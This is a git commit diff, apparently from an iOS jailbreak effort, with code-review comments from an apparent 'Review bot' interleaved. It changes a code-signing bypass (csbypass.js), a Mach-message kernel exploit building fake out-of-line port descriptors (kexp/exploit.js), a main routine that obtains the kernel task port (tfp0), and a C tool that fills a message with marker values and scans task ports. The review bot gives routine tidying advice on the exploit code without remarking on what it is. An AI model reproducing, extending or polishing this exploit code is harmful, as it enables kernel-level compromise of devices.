authorspv420 <spv@spv.sh>2022-07-15 15:03:50 -0400
committerspv420 <spv@spv.sh>2022-07-15 15:03:50 -0400
commit42647b796f0f54122e7f46522d8e681825daf54b (patch)
tree6886bfea221b15579b84ff13d1b850a1ac9f5fcf
parentd1da310f02adc0e9b5f8656ea063fd3231901611 (diff)
dump
-rw-r--r--src/js/csbypass.js2
-rwxr-xr-xsrc/js/kexp/exploit.js8
-rw-r--r--src/js/main.js6
-rwxr-xr-xtools/testlol.c26
4 files changed, 29 insertions, 13 deletions
diff --git a/src/js/csbypass.js b/src/js/csbypass.js
index 8f7a56e..3065099 100644
--- a/src/js/csbypass.js
+++ b/src/js/csbypass.js
@@ -38,7 +38,7 @@ function memcpy_exec(dst, src, size) {
printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict));
scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12));
callnarg(CFShow_addr + get_dyld_shc_slide(), dict);
- callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), read_u32(my_kIOSurfaceBytesPerRow + 4), read_u32(my_kIOSurfaceBytesPerRow + 8), read_u32(my_kIOSurfaceBytesPerRow + 12), test);
+ call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0);
printf("fuck1\n");
callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width));
printf("fuck2\n");
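Review bot: `get_dyld_shc_slide()` is recomputed for every operand in this hunk — four times on L23 alone, and again on L24, the new L26 and L28 — which makes the rewritten `call4arg` line hard to read and easy to get wrong the next time its argument list is edited. Hoist it once near the top of the function, `var slide = get_dyld_shc_slide();`, and write `CFDictionarySetValue_addr + slide` so the changed call and its neighbours line up. The body of memcpy_exec starts before this hunk and continues past it.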
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 8447c46..473bc6e 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) {
write_u32(InP + 0x18, 1);
write_u32(InP + 0x1c, init_port_set);
write_u32(InP + 0x20, real_count);
- write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)));
+ write_u32(InP + 0x24, 0x0213c600);
write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0));
write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4));
write_u32(InP + 0x30, fake_count);
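Review bot: The literal `0x0213c600` on the new L39 replaces the symbolic expression `(19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24)` with no comment, and it cannot be the value that expression produced: both of its terms are shifted by at least 16, so the old low 16 bits were always zero, whereas the new word carries `0xc600` there. A reader therefore cannot tell whether the extra bits are intentional or a transcription slip. Either keep the symbolic form and OR in the additional bits under a named constant, or add a comment naming each field packed into the word, e.g. `// packed descriptor word: TODO document fields`. r3gister's body starts before this hunk and continues beyond it.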
@@ -349,8 +349,10 @@ function r3gister(task, init_port_set, real_count, fake_count) {
function mach_ports_lookup_shit() {
printf("fuck\n");
var arrz = shit_heap(4);
+ var arrz2 = shit_heap(4);
printf("fuck\n");
- write_u32(arrz, 0);
+ write_u32(arrz, arrz2);
+ write_u32(arrz2, 0);
printf("fuck\n");
var sz = shit_heap(4);;
printf("fuck\n");
@@ -359,6 +361,7 @@ function mach_ports_lookup_shit() {
// var mts = mach_task_self();
printf("fuck\n");
calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+ scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
printf("mpl success\n");
return read_u32(read_u32(arrz) + 8);
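Review bot: The result of `calls4arg("mach_ports_lookup", ...)` on L58 is never checked, yet the new debug line on L59 and the `return` on L61 immediately dereference `read_u32(arrz)` and "mpl success" is printed regardless. If the lookup fails, `read_u32(arrz)` still holds the 4-byte `arrz2` buffer the earlier hunk pre-fills, so `read_u32(read_u32(arrz) + 8)` returns whatever lies past that buffer rather than a failure. Capture the status first, `var kr = calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);`, and return early or print the error before any of the reads. `kp` on L59 is not defined within this hunk, so its scope should be confirmed. mach_ports_lookup_shit's body starts in the preceding hunk.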
@@ -461,7 +464,6 @@ again: while (true) {
// while (true) {
//
// }
- scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
printf("fuck\n");
// var fake_port = read_u32(read_u32(arrz) + 8);
diff --git a/src/js/main.js b/src/js/main.js
index 5c45e85..75d730d 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -77,14 +77,16 @@ function main() {
large_buf[0] = 0x41424344;
printf("%x\n", read_u32(large_buf_ptr));
+ setup_fancy_rw();
+
// csbypass();
// return;
- setup_fancy_rw();
printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));
-
+
+//return;
var tfp0 = get_kernel_task();
printf("tfp0=%x\n", tfp0);
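Review bot: The new L84 adds a commented-out `//return;` beside the existing commented-out `// csbypass();` and `// return;` on L78-L79, so main now carries three dead lines whose purpose is unstated. Either delete them or collapse them into one comment that says why this path is disabled, e.g. `// csbypass() is skipped here: <reason>`. The L82/L83 pair appears to be a whitespace-only change that only inflates the diff. main's body continues past this hunk.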
diff --git a/tools/testlol.c b/tools/testlol.c
index 85c9cb2..d39bf47 100755
--- a/tools/testlol.c
+++ b/tools/testlol.c
@@ -199,20 +199,23 @@ int main(int argc, char* argv[]) {
Request *InP = &Mess.In;
Reply *OutP = &Mess.Out;
-#if 0
InP->msgh_body.msgh_descriptor_count = 1;
- InP->init_port_set.address = (void*)(init_port_set);
- InP->init_port_set.count = real_count;
+ InP->init_port_set.address = (void*)(0x41414141);
+ InP->init_port_set.count = 0x42424242;
InP->init_port_set.disposition = 19;
InP->init_port_set.deallocate = FALSE;
InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
InP->NDR = NDR_record;
- InP->init_port_setCnt = fake_count; // was real_count
+ InP->init_port_setCnt = 0x43434343; // was real_count
InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
- InP->Head.msgh_remote_port = task;
- InP->Head.msgh_local_port = mig_get_local_port();
+ InP->Head.msgh_remote_port = 0x45454545;
+ InP->Head.msgh_local_port = 0x69696969;
InP->Head.msgh_id = 3403;
-#endif
+
+ for (int i = 0; i < 0x100; i++) {
+ printf("%02x", ((uint8_t*)InP)[i]);
+ }
+ printf("\n");
printf(" InP->msgh_body.msgh_descriptor_count %p %p\n", ((void*)& InP->msgh_body.msgh_descriptor_count ) - ((void*)InP), sizeof( InP->msgh_body.msgh_descriptor_count ));
printf(" InP->init_port_set.address %p %p\n", ((void*)& InP->init_port_set.address ) - ((void*)InP), sizeof( InP->init_port_set.address ));
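Review bot: The dump loop added at L114-L116 prints a fixed `0x100` bytes starting at `InP`, but `InP` points at `Mess.In`, a `Request` (L92); unless `sizeof(Request)` is at least 256 the loop reads past the object, which is undefined behaviour and prints unrelated stack bytes as if they were part of the message. Bound it by the object instead: `for (size_t i = 0; i < sizeof *InP; i++) {` and `printf("%02x", ((const uint8_t *)InP)[i]);`. The `%p` conversions on the unchanged L118-L119 receive a pointer difference and a `size_t` rather than a `void *`, which is also a format mismatch; `%td` and `%zu` are the matching specifiers. main's body starts before this hunk and continues past it.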
@@ -255,6 +258,15 @@ typedef struct {
printf("%p\n", ((void*)ptraaa) - ((void*)kportaaa));
+ printf("===validity check\n");
+
+ uintptr_t whatever;
+
+ for (mach_port_t i = 0; i < 0x1000000; i++) {
+ if (pid_for_task(i, &whatever) == KERN_SUCCESS)
+ printf("0x%x\n", i);
+ }
+
#if 0
kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
if(ret == KERN_SUCCESS)